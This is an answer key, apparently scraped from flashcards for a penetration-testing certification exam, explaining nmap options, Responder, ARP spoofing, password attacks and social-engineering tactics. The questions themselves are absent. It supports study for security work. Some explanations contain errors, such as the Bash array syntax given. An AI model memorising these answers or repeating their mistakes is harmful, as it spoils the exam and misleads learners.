Answer 903

A

D. A stages communication trigger happens when the penetration test progresses from one phase to another.

Answer 904

A

A. To harden network communications on a Windows-based computer system, you should configure the Windows firewall properly. First, you should close all ports to ensure that nothing is accidentally left open. Then open ports for only those services that have been installed and are needed on the system.

Answer 905

A

C. A stealth scan enumerates hosts on the target network by manipulating the TCP three-way handshake. First, it sends the target a SYN packet. If a SYN-ACK is received, then the scanner knows that the destination host exists. The SYN-ACK also contains a limited amount of information about the host that can be captured and analyzed by the scanner.

Answer 906

A

A. This is an example of risk acceptance. You have evaluated the client’s tolerance of the impacts a penetration test could bring to the organization. It is important that the client be ready and able to accept the fact that a penetration test could cause a network outage or a service disruption.

Answer 907

A

A. The nmap 192.168.1.1 -A command enables OS detection, service version detection, script scanning, and traceroute to the remote host.

Answer 908

A

D. The penetration tester is using likeness as a motivating factor. By hiring young, friendly, and physically attractive assistants, the penetration tester is able to coerce employees of the target organization into revealing sensitive information about their employer.

Answer 909

A

C. Responder is a toolkit that is used to answer NetBIOS queries from Windows systems on a network. Responder is a powerful tool when exploiting NetBIOS responses. It can target individual systems or entire local networks, allowing you to analyze or respond to NetBIOS name services, pretending to be the system that the query is intended for. Responder exploits the trust in a service response to tell the client that the responder host is a legitimate service provider, causing it to send its hashed credentials, which the owner of the Responder host can then use to authenticate to legitimate servers.

Answer 910

A

B. A noncredentialed vulnerability scan is performed without authenticating to the network. Because of this, a noncredentialed scan usually identifies the least number of vulnerabilities.

Answer 911

A

B. Tailgating occurs when an intruder tags along with an authorized person through a physical barrier, such as a locking door or a turnstile. This happens with the authorized person’s knowledge and/or consent.

Answer 912

A

A. On Linux, a standard user can run an executable using the sudo program to elevate privileges and run the executable as the root user (or any other user on the system, if desired).

Answer 913

A

A. In this scenario, it would be best to revisit this situation during the lessons learned phase. The lessons learned session is the team’s opportunity to get together and discuss the testing process and results without the client present. Team members should freely discuss the test and offer suggestions for improvement. The lessons learned session is a good opportunity to highlight any innovative techniques used during the test that might be used in future engagements.

Answer 914

A

C and D. FTP and Telnet are considered to be unsecure services and protocols. This is because they transfer data, including authentication credentials, over the network as clear text. This information can be easily captured using a packet sniffer.

Answer 915

A

C. An organized crime threat actor is a group of cybercriminals whose main goal is financial gain. Attacks carried out by organized crime groups can last a long time, are very well-funded, and are usually quite sophisticated. A malicious insider attack occurs when someone within the organization uses the credentials they have been legitimately given to carry out an attack. A hacktivist’s attacks are usually politically motivated. A nation-state threat actor acts on behalf of a nation to inflict harm on a rival nation.

Answer 916

A

C. The Apple Remote Desktop (ARD) can be used to remotely manage Macintosh systems over a network connection using a graphical user interface.

Answer 917

A

D. The –T4 option tells nmap to scan in aggressive mode. This type of scan runs quite quickly. However, the speed also makes the scan easier to detect by IDS/IPS systems or the target’s IT staff.

Answer 918

A

C. A white box test is sometimes referred to as a full knowledge assessment because the penetration testers have full knowledge of the client’s network, including administrative access to all infrastructure devices and servers. This type of assessment usually provides the most comprehensive results because the testers do not need to spend time in discovery mode. They have all the information they need to immediately begin an extensive assessment.

Answer 919

A

C. The information you include in the Findings and Remediation section of your written report of findings will usually be constrained by the client’s risk appetite. For example, an organization with a higher-risk appetite may want you to only include information about high-risk or critical-risk vulnerabilities you discovered and not report medium or low-risk vulnerabilities.

Answer 920

A

B. In this scenario, you are using a conditional execution, so only one clause is executed. So, in this case, the code following the if clause will execute, making it impossible for the elif or else clause to execute. Conditional execution allows developers to write code that executes only when certain logical conditions are met. The most common conditional execution structure is the if.. then ..else statements.

Answer 921

A

D. Typically, there is no legally mandated storage time for reports after a penetration test is complete. The amount of time you are required to store the client’s report will usually be governed by your contract with the client.

Answer 922

A

C. Windows Management Instrumentation (WMI) allows for remote management and data gathering and is installed on all Windows systems, making it an attractive target for attackers and penetration testers. WMI provides users with information about the status of local or remote computer systems. It also supports actions such as the following:
- The configuration of the security settings
- The system properties
- The permissions for authorized users and user groups
- The drive labels
- The scheduling of processes to run at specific times
- Backing up the object repository
- Enabling or disabling error logging WMI can also allow the remote execution of commands, file transfers, and data gathering from files and the Registry.

Answer 923

A

B. A gray box test is sometimes referred to as a partial knowledge assessment because the penetration testers have some knowledge of the client’s network, but they don’t have the full picture. This type of assessment best emulates a real-world malicious insider attack.

Answer 924

A

B. Of the options presented here, the best recommendation to remediate shared local administrator credentials would be to implement the Local Administrator Password Solution (LAPS) from Microsoft. This solution periodically randomizes local administrator passwords and saves those secrets in Active Directory.

Answer 925

A

B. A false positive is an error in some evaluation processes in which a condition tested for is mistakenly found to have been detected. The scanner might not have sufficient access to the target system to confirm a vulnerability, or it might simply have an error in a plug-in that generates an erroneous vulnerability report. When a scanner reports a vulnerability that does not exist, this is known as a false positive error.

Answer 926

A

B. In this scenario, the client has requested that you perform a black box penetration test. Since this is a black box test, you will most likely spend most of your time performing the information gathering and vulnerability identification phase. Black box tests, sometimes called zero-knowledge tests, are intended to duplicate what an outside attacker would encounter. Testers are not provided with access to or information about an environment, so they must gather information, discover vulnerabilities, and make their way through an infrastructure or systems just as an attacker would. This can be time-consuming for the penetration tester.

Answer 927

A

A and B. The rules of engagement (ROE) should always include the timeline for the engagement as well as a review of any laws that specifically govern the target to ensure you don’t break them. A list of other organizations that you have tested in the past or a list of the target organization’s competitors is unlikely to be specified in the rules of engagement. A detailed map of the target’s network will probably not be included in a black or gray box test.

Answer 928

A

B. When declaring an array, Bash uses the following syntax: array_name = (value1, value2, value3, …).

Answer 929

A

D. In this scenario, the client does not have the budget to immediately correct all of the vulnerabilities found. In this case, the best suggestion to tell the client is to correct the most critical vulnerability first and, then when funds become available, fix the other critical vulnerabilities.

Answer 930

A

C. Lock bypass is simply that. Bypassing locks without picking them. In this scenario, the tester is attempting a physical security assessment with the use an under-the-door tool, which goes underneath a door and pulls open a door handle from the inside.

Answer 931

A

B. This is an example of risk transference. Rather than avoid the risk or mitigate the risk, the client has moved the risk to the third-party processor.

Answer 932

A

A. Censys is a web-based tool that probes a given IP address. It presents whatever information it can discover about the host assigned that IP address, such as the version of SSL/TLS it uses, the cipher suite it uses, and its certificate chain. Note that some organizations put their IP addresses on a blacklist, which severely limits the amount of information that Censys can discover about them.

Answer 933

A

D. The –oG option causes nmap to write the output from the scan to a text file in a format that allows it to be quickly searched using the grep command. You must specify a filename with this option.

Answer 934

A

A. The written report of findings contains highly sensitive information and should therefore be securely handled. It should not be stored in a manner that would allow it to be easily stolen. In this scenario, burning the file to an optical disc and storing it in a secured safe would make it more difficult for the report to be stolen than the other options listed.

Answer 935

A

A and B. Rainbow tables provide a powerful way to attack hashed passwords by performing a lookup rather than trying to use brute force. A rainbow table is a precomputed listing of every possible password for a given set of password requirements, which has then been hashed based on a known hashing algorithm like MD5. A rainbow table is used to attack a hashed password in reverse. A rainbow table is generally an offline-only attack. It uses fewer compute cycles than any other forms of attack. A brute-force attack is an attempt to crack a password or username by using a trial-and-error approach with an attacker submitting many passwords or passphrases with the chance of eventually guessing the password correctly.

Answer 936

A

C. When making a comparison between two integer values in a Bash script to see whether one is greater than the other, you use the -gt relational operator.

Answer 937

A

D. Passive scanning is a method of vulnerability detection that relies on information obtained from network data that is captured from a target computer without direct interaction. The main advantage of passive scanning for an attacker is that it does not leave a trail that could alert users or administrators. The main advantage for administrators is that it doesn’t cause undesired behavior on the target computer. Passive scanning does have limitations. It is not as complete in details as an active vulnerability scan and cannot detect any applications that are not currently sending out traffic.

Answer 938

A

D. A false positive is when the system incorrectly accepts a biometric sample as being a match. Biometric sensors sometimes make mistakes for a number of reasons. The identification process compares a biometric, such as a fingerprint or iris scan that is presented to the system, against all entries in a database for a match. This is referred to as a one-to-many search. Live biometrics change due to age, climate, or a possible injury on a finger. Vendors refer to these threshold settings as false acceptance rates (FARs) and false rejection rates (FRRs).

Answer 939

A

C. The first step in the penetration testing process is to work with the client to clearly define the scope of the test. The scope determines what penetration testers will do and how their time will be spent. Researching the organization’s products is a task that will probably be done after the scope of work has been defined. Determining the budget and gaining authorization are subtasks that are usually completed as a part of the overall scoping process.

Answer 940

A

A. Rainbow tables are lists of precomputed hashes for all possible passwords for a given set of password rules. Rainbow table tools compare hashes to the previously calculated hashes, which match to known password values. This is done via a fairly fast database lookup, allowing “cracking” of hashed passwords, even though hashes aren’t reversible. The password file is a list of hashed values.

Answer 941

A

B. A nondisclosure agreement (NDA) is a legal document that is designed to protect the confidentiality of the client’s data and other information that the penetration tester may encounter during the test.

Answer 942

A

A and D. Open-source intelligence (OSINT) is any information that is publicly available and can be passively gathered. Because it is passively gathered, you can’t use methods that actively engage the target organization to gather OSINT. For example, running a vulnerability scan is an active method, while reading social media posts and viewing corporate tax filings are passive methods. Social Security numbers and personal tax filings are both examples of protected information that is not publicly available.

Answer 943

A

B. Conducting security awareness training with employees is an example of a people-based mitigation strategy.

Answer 944

A

A and B. These may be times that call for immediate communication to the client. The following are some common penetration testing communication triggers. Communication triggers should be done upon the completion of the testing phase, a discovery of a critical finding, or the discovery of indicators of a previous compromise. In this scenario, we would want to contact the client if the system becomes unavailable following an attempted test and if the system shows an indication of prior unauthorized access.

Answer 945

A

D. Credentialed scans require read-only access to target servers. The client should follow the principle of least privilege and limit the access available to the tester. You should consider asking for a specific “audit” account to be created with similar read-only access. A dedicated “audit” account has the advantage of showing up in the logs and instantly being recognized by everyone in IT as a potentially approved activity.

Answer 946

A

C. In this scenario, insufficient time was spent getting to know the target audience for the penetration test. Time should have been spent with the client to learn about their organization, the goals of the test, and so on. Only then should the scope be created.

Answer 947

A

B. The Remote Desktop Protocol (RDP) is used on Windows systems to display the graphical desktop of a remote Windows host on the local system over a network connection. It provides full point-and-click interactivity. It can even be used to transmit sounds from the remote system to the local system and to share files between systems.

Answer 948

A

C. This is an example of risk mitigation. Instead of completely removing the risk, the client has used a security guard as a countermeasure. The risk of unauthorized access still exists, but the use of the security guard controls that risk.

Answer 949

A

B and C. The nmap and hping utilities can be used to actively enumerate and fingerprint target systems.

Answer 950

A

E. The recon-ng utility provides a web reconnaissance framework that allows you to conduct open source reconnaissance about an organization on the Web. Censys is a web-based tool that probes a given IP address. The whois command can be used to gather information from public records about who owns a particular domain. Shodan is a specialized tool that a penetration tester can use to search public sources for evidence of an Internet of Things (IoT) device that a target organization may have deployed in their network.

Answer 951

A

D. The default port used by a DNS server is 53. The DNS service is used to resolve hostnames into IP addresses (and vice versa). If the DNS server has been poorly secured, you may be able to compromise it and poison the lookup tables, enabling you to redirect legitimate name resolution requests to a fake destination host where a variety of exploits could be implemented on client systems.

Answer 952

A

A. Most likely, you will ask the client to sign a purchase order. A purchase order is a binding agreement to make a purchase from a vendor. With a purchase order in place, your organization can justify spending time and money defining a SOW and an NDA for the engagement. Because the client is essentially “trying” your services, an MSA would not yet be required, although it may be in the future.

Answer 953

A

B, C, and D. CompTIA highlights three important post-engagement cleanup activities:
- Removing any shells installed on systems during the penetration test.
- Removing any tester-created accounts, credentials, or backdoors that were installed during testing.
- Removing any tools that were installed during testing.
- Remediation of vulnerabilities is a follow-on activity and is not conducted as part of the test. The testers should remove any shells or other tools installed during testing as well as remove any accounts or credentials that they created.

Answer 954

A

D. A replay attack is also classified as a man-in-the-middle attack.

Answer 955

A

C. The -ge relational operator can be used in both Bash and PowerShell to test whether one value is numerically greater than or equal to the other.

Answer 956

A

A and E. To harden user accounts on Windows-based computer systems, you should use Group Policy to configure account lockout. This will help slow down or even prevent brute-force or password guessing attacks. You should also immediately disable or delete all unused user accounts.

Answer 957

A

C. A stages communication trigger happens when the penetration test progresses from one phase to another.

Answer 958

A

D. A dictionary attack is a type of brute-force attack. However, in a dictionary attack, a list of commonly used passwords is used, one after another, in an attempt to find the right password.

Answer 959

A

C. When creating your written report of findings after completing a penetration test, you should list the vulnerabilities you discovered in the Findings and Remediation section of the report, along with how you found them.

Answer 960

A

A. In a Karma attack, the tester uses a special wireless device to listen for SSID requests from other devices and then respond as if it were the requested access point. Victims think they are connected to a legitimate network, but they are actually connected directly to the tester. The tester typically forwards victims’ traffic to the Internet, so everything seems normal. This allows the tester to inspect the victim’s traffic and capture sensitive information.

Answer 961

A

B and C. Given this scenario, the word let does not need to be included in the script, so it can be removed, and in Bash, the equivalent to an = is -eq, which is the arithmetic binary operator. Once these modifications are made, the script will work as expected.

Answer 962

A

D. The default port for the SMB/CIFS service using direct TCP connections is port 445. The SMB/CIFS protocol is used for file sharing, so the host in question must be a file server.

Answer 963

A

A. In this scenario, the tester should recommend that the client enable HTTP Strict Transport Security (HSTS). The HSTS response header lets a website tell browsers that it should only be accessed using HTTPS, instead of using HTTP. It is an opt-in security enhancement that is specified by a web application through the use of a special response header. Once a supported browser receives this header, that browser will prevent any communications from being sent over HTTP to the specified domain and will instead send all communications over HTTPS.

Answer 964

A

B. Interrogation (also called questioning) is interviewing an individual with the goal of obtaining useful information. Interrogation may involve a wide array of techniques, ranging from developing a bond with the individual to torture. With this technique, fear can be used as a motivator. However, this technique is not usually used by penetration testers.

Answer 965

A

D and E. IoT devices, such as smart appliances, televisions, and so on, tend to have the weakest inherent security. They aren’t designed with security in mind, they are difficult to manage, and vendors rarely release security updates. Embedded devices used in industrial control devices tend to suffer from the same weaknesses.

Answer 966

A

D. The default ports used by a web server are 80 (HTTP) and 443 (HTTPS). Data transmitted on port 80 is usually sent in the clear, while data sent on port 443 is encrypted using SSL/TLS.

Answer 967

A

A. PsExec is a command-line tool that lets you execute processes on remote systems and redirect console applications’ output to the local system so that the applications appear to be running locally. It is a lightweight Telnet replacement that allows you to execute processes on other systems.

Answer 968

A

C and D. A web server is associated with this domain name. It is configured to use the HTTP protocol (insecure) on port 80 and the HTTPS protocol (secure).

Answer 969

A

B and D. When running a white box assessment, you will usually want the client to white-list the testers’ user accounts in their IPS. This will prevent them from being blocked when they start probing defenses. They should also configure security exceptions that allow the penetration testers’ systems to bypass NAC security controls.

Answer 970

A

B. In a credentials brute-force attack, the tester will try to log in to the application using every username and password. Hydra is a brute-forcing tool that can crack systems using password guessing.

Answer 971

A

C. The testing agreement should contain a disclaimer indicating that the test is valid only at the point in time that it is conducted because future technological changes could expose new vulnerabilities that are currently unknown. You can’t be held liable if new exploits or vulnerabilities appear a later point in time after the test is complete.

Answer 972

A

D. By masquerading as an FBI agent, the penetration tester in this example utilized authority (and possibly fear) as a motivation factor to coerce the employee into divulging sensitive information.

Answer 973

A

C. A username and a password are both examples of something you know and therefore do not constitute multifactor authentication. A fingerprint scan is an example of something you are. Requiring a fingerprint scan would improve the security of the system because authentication factors from multiple categories would be required for users to log on.

Answer 974

A

C. The –T2 option causes nmap to scan in polite mode. This type of scan runs quite slowly. However, the slowness also makes the scan harder to detect.

Answer 975

A

A. Adding the echo $TargetHost line to a Bash script causes it to display the value of a variable named TargetHost on the screen.

Answer 976

A

C. The Health Insurance Portability and Accountability Act of 1996 governs healthcare organizations. They must comply with the rules and regulations specified in the act, such as requiring a risk analysis and testing the organization’s security controls.

Answer 977

A

B. NBTSTAT identifies NetBIOS workstations with an ID of <00>. Based on this output, you know that PROD-9 is most likely a Windows workstation (or a Linux workstation running the Samba service).

Answer 978

A

C. One of the first steps when looking to gain access to a host, system, or application is to enumerate usernames. Once usernames are guessed, targeted password-based attacks can then be attempted. A RID cycling attack attempts to enumerate user accounts through null sessions. If a tester specifies a password file, it will automatically attempt to brute force the user accounts when it’s finished enumerating. So, in this scenario, attempting RID cycling will be the next step the tester should try.

Answer 979

A

B. The SMTP protocol is used to transfer email messages between mail transfer agents (MTAs).

Answer 980

A

A. A dictionary attack is a method of breaking into a password-protected computer or server by thoroughly entering every word in a dictionary as a password. Dictionary attacks work because many computer users use ordinary words as passwords. Dictionary attacks rely on a prebuilt dictionary of words. In many cases, penetration testers can add additional specific dictionary entries to a dictionary file for their penetration test based on knowledge, this can be very beneficial in performing a dictionary attack. In this scenario, the penetration tester used social media to find additional keywords that may be beneficial in a dictionary attack.

Answer 981

A

C. A man-in-the-middle attack intercepts a communication between two systems. ARP stands for Address Resolution Protocol, and it allows the network to translate IP addresses into MAC addresses. In this scenario, the attacker wants to perform a man-in-the-middle attack; it is done by performing arpspoof -t . The -t switch specifies a particular host to ARP poison.

Answer 982

A

A. The Simple Object Access Protocol (SOAP) is a messaging protocol specification that defines how structured information can be exchanged between web applications. SOAP project files can be created from Web Services Description Language (WSDL) files.

Answer 983

A

A. The Browser Exploitation Framework (BeEF) is a penetration testing utility designed to exploit weaknesses in web browsers using client-side attacks.

Answer 984

A

A. Most likely, the vulnerability scanner generated a false positive error. The purpose of the adjudication process after a vulnerability scan is to determine the value and validity of the scan results. False positives, such as the one discussed in this scenario, should be filtered out in your final report to the client.

Answer 985

A

A. PowerShell requires the use of the $ before an array name in an assignment operation. The elements of the array are then provided as a comma-separated list. Option B would work in Bash, option C would work in Ruby or Python, and option D does not follow the correct syntax for a PowerShell command. PowerShell is much simpler in the way that you declare and use variables. You just need to remember to precede the variable name with a $, whether it’s for setting, changing, or retrieving the value stored in that variable.

Answer 986

A

C. Metasploit is launched by running msfconsole from the command line. The msfconsole command is located in the /usr/share/metasploit-framework/msfconsole directory

Answer 987

A

B. Because this is a compliance penetration test, you first need to access the PCI-DSS standards and review the requirements for the client to be considered “compliant.” Typically, the governing organization will publish checklists that you should use to assess compliance. These checklists will strongly influence the scope, budget, and schedule for the test.

Answer 988

A

B, E, and G. In this situation, since the tester was able to compromise a single workstation and is able to move laterally through the network, the best recommendations to give the client would be the following:
- Use multifactor authentication. Multifactor authentication (MFA) is an authentication method in which a computer user is granted access only after successfully presenting two or more pieces of evidence (or factors) to an authentication mechanism.
- Increase minimum password complexity. Complex passwords use different types of characters in unique ways to increase security, making it harder for an attacker to crack.
- Enable full-disk encryption. Full-disk encryption (FDE) is encryption at the hardware level. FDE works by automatically converting data on a hard drive into a form that cannot be understood by anyone who doesn’t have the key to “undo” the conversion.

Answer 989

A

B. A discovery scan identifies the operating systems that are running on a network, maps those systems to IP addresses, and enumerates the open ports and services on those systems. Discovery scans provide penetration testers with an automated way to identify hosts that exist on the network and build an asset inventory.

Answer 990

A

A and C. After a penetration test is complete, you should meet with your teams and discuss lessons learned. You should identify what went well and what improvements need to be made. For example, you should discuss which exploits worked and which didn’t. You should document best practices for using those exploits such that you don’t have to relearn them the next time you conduct a penetration test.

Answer 991

A

A. In this scenario, the attacker was using a redirect. The security analyst should block URL redirections. A URL redirect is a web server function that sends a user from one URL to another. Redirects commonly take the form of an automated redirect that uses one of a series of status codes defined within the HTTP protocol. So, when a web browser attempts to open a URL that has been redirected, a page with a different URL is opened.

Answer 992

A

D. Passive reconnaissance is also known as open source intelligence (OSINT). The idea behind passive reconnaissance is to gather information about a target using only publicly available resources. Shodan is a specialized search engine that provides discovery of specific types of computers and devices that are connected to the Internet by using a variety of filters. Peach is a fuzzing tool, OpenVAS performs network vulnerability scans, and CeWL is a custom wordlist generator that searches websites for keywords that may be used in password-guessing attacks.

Answer 993

A

A. Whois can potentially reveal a great deal of information about a target organization, including the following:
- The domain registrar
- The registrant’s legal name
- The registrant’s address
- The registrant’s phone number
- A contact email address
- The name of the domain administrator
- Some organizations ask their registrar to hide this information from the public.

Answer 994

A

C. Because patient records are protected by the HIPPA law in the United States, this is an example of a compliance assessment. Compliance-based assessments are designed to test compliance with specific laws. Objective-based assessments are usually designed to assess the overall security of an organization. Gray box and white box assessments identify the level of knowledge the attacker has of the organization.

Answer 995

A

A. In this scenario, since there are several high-numbered ports listening on a public web server. The best recommendation would be to disable unneeded services since the client only uses post 443. The unnecessary services can pose a security risk because they increase the attack surface, providing a potential attacker with additional ways to try to exploit the system.

Answer 996

A

A. An advanced persistent threat (APT) is a computer network attack in which a person or group gains unauthorized access to a network and remains undetected for an extended period of time. APTs provide the highest level of threat on the adversary tier list. Many of the techniques used by advanced persistent threat actors are useful for penetration testers, and vice versa. If your persistence techniques aren’t monitored for or detected by the client’s systems, the findings should include information that can help them design around this potential problem.

Answer 997

A

B. To harden a server system, you should make sure all user accounts have a password assigned to them. One way to do this is to review the /etc/shadow file and look for any accounts that don’t have a password assigned.

Answer 998

A

D. The host is probably a web server. The system administrator has likely changed the default web server ports to nonstandard ports in an attempt to hide its function. This is an example of “security by obscurity.”

Answer 999

A

B and D. Application programming interface (API) documentation describes how software components communicate. Software development kits (SDKs) also come with documentation. Organizations may create their own SDKs, use commercial SDKs, or use open source SDKs. Understanding which SDKs are in use and where they are can help a penetration tester test applications, especially those written in-house.

Brainscape's Knowledge GenomeTM

Sybex Flashcards

Brainscape's Knowledge Genome^TM